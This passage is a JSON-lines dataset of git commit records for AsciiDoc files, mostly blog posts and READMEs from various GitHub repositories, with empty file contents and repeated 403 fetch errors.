BOX","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-21-ZOMBIE-EDITION-SURVIVAL-BOX.adoc","new_file":"_posts\/2016-01-21-ZOMBIE-EDITION-SURVIVAL-BOX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2848218fc0ef0792132764fb3d1b6f38791ac489","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e26e9ba3f8308f91e9c54cc9f48657499c36ea2","subject":"Readme","message":"Readme\n\n","repos":"ysden123\/poc,ysden123\/poc,ysden123\/poc,ysden123\/poc,ysden123\/poc,ysden123\/poc","old_file":"kinesis\/sample1\/README.adoc","new_file":"kinesis\/sample1\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ysden123\/poc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"857adb57d99d76156f04b738f232a77fbc8e174f","subject":"more doc work","message":"more doc work\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b743578e4ecaac71ad14b3a7648acd5b56d7fc00","subject":"Update 2016-04-04-T-I-T-R-E.adoc","message":"Update 2016-04-04-T-I-T-R-E.adoc","repos":"nicolasmaurice\/nicolasmaurice.github.io,nicolasmaurice\/nicolasmaurice.github.io,nicolasmaurice\/nicolasmaurice.github.io,nicolasmaurice\/nicolasmaurice.github.io","old_file":"_posts\/2016-04-04-T-I-T-R-E.adoc","new_file":"_posts\/2016-04-04-T-I-T-R-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolasmaurice\/nicolasmaurice.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff8a92190dc98cb29301580c81a789356f267394","subject":"Update 2016-11-16-Test-post.adoc","message":"Update 2016-11-16-Test-post.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/hubpress,pdudits\/hubpress","old_file":"_posts\/2016-11-16-Test-post.adoc","new_file":"_posts\/2016-11-16-Test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adea883183dd6a8ab3eeb4063269f148743ce9b7","subject":"Update 2017-03-26-Coordenadas-por-Geocodificacion-PHP.adoc","message":"Update 2017-03-26-Coordenadas-por-Geocodificacion-PHP.adoc","repos":"AgustinQuetto\/AgustinQuetto.github.io","old_file":"_posts\/2017-03-26-Coordenadas-por-Geocodificacion-PHP.adoc","new_file":"_posts\/2017-03-26-Coordenadas-por-Geocodificacion-PHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AgustinQuetto\/AgustinQuetto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eef8a5ba84d7e9994713466139bff9a1eb06714d","subject":"Update 2016-09-18-Information-Technology-Week-2.adoc","message":"Update 2016-09-18-Information-Technology-Week-2.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-18-Information-Technology-Week-2.adoc","new_file":"_posts\/2016-09-18-Information-Technology-Week-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38f7d4be0b0f222ec3aa83f3228b4aaaf47c7ac3","subject":"Update 2018-04-13-To-automate-analyzing-J-I-R-A.adoc","message":"Update 2018-04-13-To-automate-analyzing-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-To-automate-analyzing-J-I-R-A.adoc","new_file":"_posts\/2018-04-13-To-automate-analyzing-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec7a702108d3c800caca6d1e7c1f8e467f6c1f15","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11801dcc32def8bc42f55d5e89696dab0c757df2","subject":"Update 2016-7-19-and.adoc","message":"Update 2016-7-19-and.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-19-and.adoc","new_file":"_posts\/2016-7-19-and.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5eecd4bf3765323a994fb14a33b4738bf182312a","subject":"Adding the new page for trying out GKO","message":"Adding the new page for trying out GKO\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/kubernetes\/apim-kubernetes-operator-user-guide-play.adoc","new_file":"pages\/apim\/3.x\/kubernetes\/apim-kubernetes-operator-user-guide-play.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"958ce6688ed76a2ad8389f49f30b513d8368fc3a","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"128739a76c0cdd08d43f6cc3ae1b0565515e349f","subject":"Renamed '_posts\/2019-01-31-Your-Blog-title.adoc' to '_posts\/2019-01-31-Blog-post-two.adoc'","message":"Renamed '_posts\/2019-01-31-Your-Blog-title.adoc' to '_posts\/2019-01-31-Blog-post-two.adoc'","repos":"mrfgl\/blog,mrfgl\/blog,mrfgl\/blog,mrfgl\/blog","old_file":"_posts\/2019-01-31-Blog-post-two.adoc","new_file":"_posts\/2019-01-31-Blog-post-two.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrfgl\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"262b47efa7984e728929a4f4d36503314b800611","subject":"Added news\/2017-12-12-forge-3.8.1.final.asciidoc","message":"Added news\/2017-12-12-forge-3.8.1.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-12-12-forge-3.8.1.final.asciidoc","new_file":"news\/2017-12-12-forge-3.8.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"94b6269ad186528d81fffc58204998766729fa87","subject":"y2b create post Are You Using Android Pay Yet?","message":"y2b create post Are You Using Android Pay Yet?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-12-Are-You-Using-Android-Pay-Yet.adoc","new_file":"_posts\/2016-12-12-Are-You-Using-Android-Pay-Yet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ceac0858b3d5a911ddbc2018fc9a71038ab4141f","subject":"Update 2017-09-15-Episode-112-Billionaires-Rave.adoc","message":"Update 2017-09-15-Episode-112-Billionaires-Rave.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-09-15-Episode-112-Billionaires-Rave.adoc","new_file":"_posts\/2017-09-15-Episode-112-Billionaires-Rave.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d700d6ec05254f7026073d8aa08626a5671e0603","subject":"Update 2016-07-22-Un-secret-entre-pretres.adoc","message":"Update 2016-07-22-Un-secret-entre-pretres.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-22-Un-secret-entre-pretres.adoc","new_file":"_posts\/2016-07-22-Un-secret-entre-pretres.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ece558903831e61576f2063fd901f25c5d9f9f1","subject":"Update 2014-10-03-Haskell-is-Cool.adoc","message":"Update 2014-10-03-Haskell-is-Cool.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-10-03-Haskell-is-Cool.adoc","new_file":"_posts\/2014-10-03-Haskell-is-Cool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bef553ed9d7a7c932d20e80b9ef07ec415cd9d19","subject":"Update 2014-10-10-Sort-in-a-Tweet.adoc","message":"Update 2014-10-10-Sort-in-a-Tweet.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-10-10-Sort-in-a-Tweet.adoc","new_file":"_posts\/2014-10-10-Sort-in-a-Tweet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeebc72b0e7834df265b88e82e872ece87e51523","subject":"Update 2015-02-24-Need-h1-to-save.adoc","message":"Update 2015-02-24-Need-h1-to-save.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Need-h1-to-save.adoc","new_file":"_posts\/2015-02-24-Need-h1-to-save.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fd9a5e5c7c0dac320cc2885dedf9d3e250a8ae8","subject":"y2b create post Apple Watch - Is it actually Sapphire?","message":"y2b create post Apple Watch - Is it actually Sapphire?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-04-27-Apple-Watch--Is-it-actually-Sapphire.adoc","new_file":"_posts\/2015-04-27-Apple-Watch--Is-it-actually-Sapphire.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d33960cc5a54f1a4b29f10cbeed699729c12b6b8","subject":"y2b create post See 3D Without Glasses On Your Phone!","message":"y2b create post See 3D Without Glasses On Your Phone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-13-See-3D-Without-Glasses-On-Your-Phone.adoc","new_file":"_posts\/2016-09-13-See-3D-Without-Glasses-On-Your-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d9a9bca29e9337bebd19038176cf4df6095274d","subject":"Update 2017-01-25-So-youre-starting-a-revolution.adoc","message":"Update 2017-01-25-So-youre-starting-a-revolution.adoc","repos":"willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io","old_file":"_posts\/2017-01-25-So-youre-starting-a-revolution.adoc","new_file":"_posts\/2017-01-25-So-youre-starting-a-revolution.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willnewby\/willnewby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fe258a32093e875fb03c780736c09faad6232ce","subject":"Update 2018-11-28-Some-Great-Books-on-Investment.adoc","message":"Update 2018-11-28-Some-Great-Books-on-Investment.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-11-28-Some-Great-Books-on-Investment.adoc","new_file":"_posts\/2018-11-28-Some-Great-Books-on-Investment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9620c858120a9b4ba8168f154d47c943888a32b","subject":"Started architecture document","message":"Started architecture document\n","repos":"khartec\/waltz,khartec\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev,kamransaleem\/waltz,khartec\/waltz,khartec\/waltz,kamransaleem\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev","old_file":"docs\/design\/completed\/architecture\/ARCHITECTURE.adoc","new_file":"docs\/design\/completed\/architecture\/ARCHITECTURE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73bfc097151fedec2d8490b89da9b2a239b8909f","subject":"Delete Writers_Guide.adoc","message":"Delete Writers_Guide.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"Writers_Guide.adoc","new_file":"Writers_Guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88ab36b97b3f47ef76ba6629f36daae2abaabffc","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5575d539b7e5bfbeaa4aa6ea2223510f991d963","subject":"Update technical-manual.adoc","message":"Update technical-manual.adoc","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c3f6b09e9f1736999393a1bfae015c36dcb77ecd","subject":"y2b create post Unlock Any MacBook Without The Password","message":"y2b create post Unlock Any MacBook Without The Password","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-29-Unlock%20Any%20MacBook%20Without%20The%20Password.adoc","new_file":"_posts\/2017-11-29-Unlock%20Any%20MacBook%20Without%20The%20Password.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee85b362e567b02d1aa1cd6bb09d125e30925141","subject":"Intitial Sample instructions","message":"Intitial Sample instructions\n","repos":"OpenHFT\/Chronicle-Queue-Sample","old_file":"simple-input\/README.adoc","new_file":"simple-input\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Queue-Sample.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7fb2fa198ed0137e1e252a72bdcc1e4b3f6b8c72","subject":"hello validation","message":"hello validation\n","repos":"mygithubwork\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works","old_file":"validation.adoc","new_file":"validation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6eed0293beb27c0d2218dcbbe2aafe7152828f7a","subject":"Link to web-api pom","message":"Link to web-api pom\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/EE.adoc","new_file":"Best practices\/EE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c38fba0e818372004bce77075915df0c1c7d88dc","subject":"Update 2016-03-28-android.adoc","message":"Update 2016-03-28-android.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-28-android.adoc","new_file":"_posts\/2016-03-28-android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf013a89a64e067960d33f8fc876072c45c4758b","subject":"Update 2016-06-30-teszt-2.adoc","message":"Update 2016-06-30-teszt-2.adoc","repos":"Olika120\/Olika120.github.io,Olika120\/Olika120.github.io,Olika120\/Olika120.github.io,Olika120\/Olika120.github.io","old_file":"_posts\/2016-06-30-teszt-2.adoc","new_file":"_posts\/2016-06-30-teszt-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Olika120\/Olika120.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6183cd9a41e3f584b654b7b6a176b55891d624b","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56f003e1484bba71409abcdc773c7e92de6e8be7","subject":"y2b create post MUSCLE GAMING? (Shape Up Demo)","message":"y2b create post MUSCLE GAMING? (Shape Up Demo)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-11-13-MUSCLE-GAMING-Shape-Up-Demo.adoc","new_file":"_posts\/2014-11-13-MUSCLE-GAMING-Shape-Up-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfd2d3fb6d42dc72f7b033e552ec8839ed05aa4a","subject":"es6 tips","message":"es6 tips\n","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"es6.adoc","new_file":"es6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"0955967b2bec6d6ca18863ed09d3333ee20784d5","subject":"CL - starting swank server","message":"CL - starting swank server\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"798bd97c712e1784b89652cb641062d4fdda7f53","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"166690c2a69e7557afa5f475889e8f644239abe6","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21e29516f294b4fffec1f0cb7156773b0aa0f6d2","subject":"Move readme file in the main directory","message":"Move readme file in the main directory","repos":"arduino-org\/CiaoMCU","old_file":"Ciao\/README.adoc","new_file":"Ciao\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arduino-org\/CiaoMCU.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3aa2a028d3a9f8bb4ba94ef3f2530152445caecf","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b369c07ccee7a87600c1460f15463d5c562a2762","subject":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b67cc490d66e46deb1721b997c120edcb4407bf8","subject":"Add my resume","message":"Add my resume\n\nChange-Id: Idb5fb2ac6cecfdd1fea7eb01060dbaa29b402d52\n","repos":"BruceZu\/KeepTry,BruceZu\/KeepTry,BruceZu\/KeepTry,BruceZu\/sawdust,BruceZu\/sawdust,BruceZu\/sawdust,BruceZu\/sawdust,BruceZu\/KeepTry","old_file":"Resume_BruceZu.adoc","new_file":"Resume_BruceZu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BruceZu\/sawdust.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92bb35bdf05e3a8178445d0fe37af34e1633b5c0","subject":"Update 2016-11-08-Episode-78-Rethemes-and-Cross-promotions.adoc","message":"Update 2016-11-08-Episode-78-Rethemes-and-Cross-promotions.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-11-08-Episode-78-Rethemes-and-Cross-promotions.adoc","new_file":"_posts\/2016-11-08-Episode-78-Rethemes-and-Cross-promotions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b915df7f335ec947cfc8339aa8f59be0188e4469","subject":"[examples] Add a quickstart guide for YCSB","message":"[examples] Add a quickstart guide for YCSB\n\nAdds a brief quickstart guide to show the steps to run YCSB\nagainst a Kudu cluster.\n\nChange-Id: I26255c9389a8bb59af1009cd67f720149e59f4a1\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/15204\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"examples\/quickstart\/ycsb\/README.adoc","new_file":"examples\/quickstart\/ycsb\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/helifu\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d763911db3edb0e528ffe24a250f6b24ebecbf15","subject":"Update 2017-01-13.adoc","message":"Update 2017-01-13.adoc","repos":"berryzed\/tech-blog,berryzed\/tech-blog,berryzed\/tech-blog,berryzed\/tech-blog","old_file":"_posts\/2017-01-13.adoc","new_file":"_posts\/2017-01-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/berryzed\/tech-blog.git\/': The requested URL returned error: 